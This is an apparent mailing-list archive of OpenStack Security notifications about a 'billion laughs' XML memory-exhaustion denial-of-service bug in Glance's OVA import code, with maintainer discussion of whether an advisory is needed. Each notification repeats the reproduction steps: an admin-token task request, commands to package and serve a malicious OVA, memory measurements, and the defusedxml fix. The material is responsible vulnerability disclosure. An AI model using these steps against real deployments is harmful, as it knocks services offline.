http://developer.openstack.org/api-ref/image/v2/index.html?expanded=create-task-detail [2] https://www.youtube.com/watch?v=_zyFzElwwW0 -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From fungi at yuggoth.org Wed Sep 28 20:59:54 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 28 Sep 2016 20:59:54 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160928205956.24229.22813.launchpad@soybean.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From fungi at yuggoth.org Wed Sep 28 21:06:06 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 28 Sep 2016 21:06:06 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160928210606.23707.3836.malone@gac.canonical.com> Charles: It looks like consensus has formed around this being a risk in an "experimental" feature (the implementation was added with known security caveats and so limited to admin users until those could be solved). Rather than trying to get patches for it backported to earlier supported releases and a security advisory sent recommending applying those patches, a security note may be drafted better describing these risks so that deployers are more aware and can avoid them. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From charles.neill at rackspace.com Wed Sep 28 22:59:08 2016 From: charles.neill at rackspace.com (Charles Neill) Date: Wed, 28 Sep 2016 22:59:08 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160928225908.27516.3455.malone@chaenomeles.canonical.com> Okay, so it mainly comes down to the implemented spec describing it as experimental, and the reduced likelihood of exploit based on it being admin-only. Good to know for future bugs, thanks. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From tmcpeak at us.ibm.com Wed Sep 28 23:20:01 2016 From: tmcpeak at us.ibm.com (Travis McPeak) Date: Wed, 28 Sep 2016 23:20:01 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160928232001.21379.48551.malone@soybean.canonical.com> I don't think it matters how the feature is described in the spec. If it's on by default it's not experimental. Restricted to admin definitely lowers impact though. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric 